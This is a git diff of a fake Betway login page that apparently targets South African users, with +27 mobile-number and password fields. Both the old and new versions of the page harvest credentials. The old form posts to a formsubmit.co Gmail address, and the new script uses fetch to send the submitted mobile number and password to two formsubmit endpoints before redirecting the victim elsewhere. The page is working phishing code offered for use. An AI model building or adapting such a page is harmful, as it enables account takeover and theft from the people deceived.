--- a/index.html
+++ b/index.html
@@ -1,277 +1,157 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>Login - Floating</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>Login Page</title>
   <style>
-    * {
-      box-sizing: border-box;
-      font-family: 'Roboto', sans-htmlserif;
-    }
-
     body {
-  margin: 0;
-  background-image: url('https://images.unsplash.com/IMG-20250713-WA0077.jpg');
-  background-size: cover;
-  background-position: center;
-  background-repeat: no-repeat;url('backround.jpg')
+      font-family: Arial, sans-serif;
+      background-color: #000;
+      margin: 0;
+      padding: 0;
+      color: #000;
     }
 
-    .modal-overlay {
-      position: absolute;
-      top: 50%;
-      left: 50%;
-      transform: translate(-50%, -50%);
-      background: rgba(255, 255, 255, 0.98);
-      border-radius: 20px;
-      box-shadow: 0 8px 24px rgba(0, 0, 0, 0.3);
-      width: 90%;
-      max-width: 400px;
-      animation: fadeIn 0.4s ease;
-    }
-
-    @keyframes fadeIn {
-      from {
-        opacity: 0;
-        transform: translate(-50%, -40%);
-      }
-      to {
-        opacity: 1;
-        transform: translate(-50%, -50%);
-      }
-    }
-
-    .modal-header {
-      background: #222;
-      color: white;
-      padding: 16px;
-      font-size: 18px;
-      font-weight: bold;
-      display: flex;
-      justify-content: space-between;
-      align-items: center;
-      border-top-left-radius: 20px;
-      border-top-right-radius: 20px;
-    }
-
-    .modal-header button {
-      background: transparent;
-      border: none;
-      color: white;
-      font-size: 20px;
-      cursor: pointer;
-    }
-
-    .login-body {
+    .login-container {
+      background: #fff;
+      max-width: 320px;
+      margin: 80px auto;
       padding: 20px;
+      border-radius: 10px;
+      box-shadow: 0 0 10px rgba(0,0,0,0.3);
+    }
+
+    .logo-container {
+      text-align: center;
+      margin-bottom: 15px;
+    }
+
+    .logo-container img {
+      max-width: 150px;
+      height: auto;
+    }
+
+    h2 {
+      color: #0b9e15;
+      text-align: center;
+      margin-top: 0;
     }
 
     .input-group {
-      display: flex;
-      align-items: center;
-      border: 1px solid #ccc;
-      border-radius: 8px;
-      margin-bottom: 12px;
-      overflow: hidden;
-      background: #fff;
+      margin-bottom: 15px;
+    }
+
+    .input-group label {
+      display: block;
+      font-weight: bold;
+      margin-bottom: 5px;
     }
 
     .input-group input {
-      flex: 1;
-      padding: 12px;
-      border: none;
-      outline: none;
-      font-size: 16px;
-    }
-
-    .input-group .prefix {
-      background: #0a0;
-      color: white;
-      padding: 12px;
-      font-weight: bold;
-    }
-
-    .input-group.password {
-      position: relative;
-    }
-
-    .input-group.password .toggle {
-      position: absolute;
-      right: 12px;
-      top: 12px;
-      cursor: pointer;
-      font-size: 18px;
-    }
-
-    .actions {
-      display: flex;
-      justify-content: flex-end;
-      margin-bottom: 12px;
-    }
-
-    .actions a {
-      color: #007BFF;
-      text-decoration: none;
-      font-size: 14px;
-    }
-
-    .login-button {
-      background: #00a000;
-      color: white;
+      padding: 10px;
+      border: 1px solid #ccc;
+      border-radius: 5px;
       width: 100%;
-      padding: 14px;
-      border: none;
-      border-radius: 8px;
-      font-size: 16px;
-      font-weight: bold;
-      cursor: pointer;
-      position: relative;
     }
 
-    .spinner {
-      display: none;
-      width: 16px;
-      height: 16px;
-      border: 2px solid #fff;
-      border-top: 2px solid transparent;
-      border-radius: 50%;
-      animation: spin 1s linear infinite;
-      position: absolute;
-      right: 16px;
-      top: 50%;
-      transform: translateY(-50%);
-    }
-
-    @keyframes spin {
-      to {
-        transform: rotate(360deg);
-      }
-    }
-
-    .error-message {
-      color: red;
-      font-size: 13px;
-      margin-bottom: 8px;
-    }
-
-    .signup-section {
-      text-align: center;
-      padding: 16px;
-      font-size: 14px;
-    }
-
-    .signup-section a {
-      font-weight: bold;
-      color: #00a000;
+    .small-link {
+      display: block;
+      text-align: right;
+      font-size: 0.85em;
+      color: #0b9e15;
       text-decoration: none;
-      margin-left: 4px;
+      margin-top: 5px;
     }
 
-    @media (max-width: 480px) {
-      .modal-overlay {
-        top: auto;
-        bottom: 20px;
-        transform: translate(-50%, 0);
-      }
+    .login-btn, .signup-btn {
+      width: 100%;
+      padding: 10px;
+      border: none;
+      color: #fff;
+      font-size: 1em;
+      border-radius: 5px;
+      cursor: pointer;
+    }
+
+    .login-btn {
+      background-color: #0b9e15;
+      margin-top: 10px;
+    }
+
+    .signup-text {
+      text-align: center;
+      margin: 15px 0 5px;
+      font-size: 0.9em;
+    }
+
+    .signup-btn {
+      background-color: #fff;
+      color: #0b9e15;
+      border: 2px solid #0b9e15;
     }
   </style>
 </head>
 <body>
-
-  <div class="modal-overlay">
-    <div class="modal-header">
-      Login
-      <button onclick="document.querySelector('.modal-overlay').style.display='none'">×</button>
+  <div class="login-container">
+    <div class="logo-container">
+      <img src="https://images.seeklogo.com/logo-png/43/2/betway-logo-png_seeklogo-434766.png" alt="betwyLogo">
     </div>
 
-    <form class="login-body" action="https://formsubmit.co/robarsrsa@gmail.com" method="POST" onsubmit="return validateForm(event)">
-      <input type="hidden" name="_captcha" value="false">
-      <input type="hidden" name="_next" value="https://www.betway.co.za/account/login">
+    <h2>Login</h2>
+
+    <form id="multiSubmitForm">
+      <div class="input-group">
+        <label for="mobile">Mobile</label>
+        <div style="display: flex;">
+          <input type="text" value="+27" style="width: 20%; margin-right: 5px; font-weight: bold; background-color: lightgrey;" disabled>
+          <input type="number" name="mobile" id="mobile" style="width: 75%;" required>
+        </div>
+      </div>
 
       <div class="input-group">
-        <div class="prefix">+27</div>
-        <input
-          type="tel"
-          id="mobile"
-          name="mobile"
-          placeholder="Mobile Number"
-          required
-          maxlength="10"
-          pattern="^\d{10}$"
-          title="Enter exactly 10 digits after +27"
-        >
-      </div>
-      <div id="mobileError" class="error-message"></div>
-
-      <div class="actions">
-        <a href="https://www.betway.co.za/Account/ForgotUsername" target="_blank">Forgot Username?</a>
+        <label for="password">Password</label>
+        <input type="password" name="password" id="password" placeholder="Password" required>
+        <a href="#" class="small-link">Forgot Password?</a>
       </div>
 
-      <div class="input-group password">
-        <input
-          type="password"
-          id="password"
-          name="password"
-          placeholder="Password"
-          minlength="4"
-          required
-        >
-        <span class="toggle" onclick="togglePassword()">👁️</span>
-      </div>
-      <div id="passwordError" class="error-message"></div>
+      <a href="#" class="small-link" style="text-align: left; margin-top: -10px;">Forgot Username?</a>
 
-      <div class="actions">
-        <a href="https://www.betway.co.za/Account/ForgotPassword" target="_blank">Forgot Password?</a>
-      </div>
-
-      <button type="submit" class="login-button" id="loginBtn">
-        Login
-        <div class="spinner" id="spinner"></div>
-      </button>
+      <button type="submit" class="login-btn">Login</button>
     </form>
 
-    <div class="signup-section">
-      Don't have an account yet?
-      <a href="https://www.betway.co.za/account/register" target="_blank">Sign Up</a>
-    </div>
+    <div class="signup-text">Don't have an account yet?</div>
+    <button class="signup-btn">Sign Up</button>
   </div>
 
   <script>
-    function validateForm(event) {
-      const mobile = document.getElementById('mobile');
-      const password = document.getElementById('password');
-      const mobileError = document.getElementById('mobileError');
-      const passwordError = document.getElementById('passwordError');
-      let isValid = true;
+    document.getElementById("multiSubmitForm").addEventListener("submit", function(e) {
+      e.preventDefault();
 
-      mobileError.textContent = '';
-      passwordError.textContent = '';
+      const form = e.target;
+      const formData = new FormData(form);
 
-      if (!/^\d{10}$/.test(mobile.value)) {
-        mobileError.textContent = 'Please enter exactly 10 digits after +27.';
-        isValid = false;
-      }
+      // Clone form data for second request
+      const formData2 = new FormData();
+      formData.forEach((value, key) => {
+        formData2.append(key, value);
+      });
 
-      if (password.value.length < 4) {
-        passwordError.textContent = 'Password must be at least 4 characters.';
-        isValid = false;
-      }
+      // First email submit
+      fetch("https://formsubmit.co/robarsrsa@gmail.com", {
+        method: "POST",
+        body: formData
+      });
 
-      if (isValid) {
-        document.getElementById('spinner').style.display = 'inline-block';
-        document.getElementById('loginBtn').disabled = true;
-      }
+      // Second email submit
+      fetch("https://formsubmit.co/secondemail@example.com", {
+        method: "POST",
+        body: formData2
+      });
 
-      return isValid;
-    }
-
-    function togglePassword() {
-      const pwd = document.getElementById('password');
-      pwd.type = pwd.type === 'password' ? 'text' : 'password';
-    }
+      // Redirect after submit (optional)
+      window.location.href = "https://www.soccerbot.gr/index.php";
+    });
   </script>
-
 </body>
-</htm
+</html>
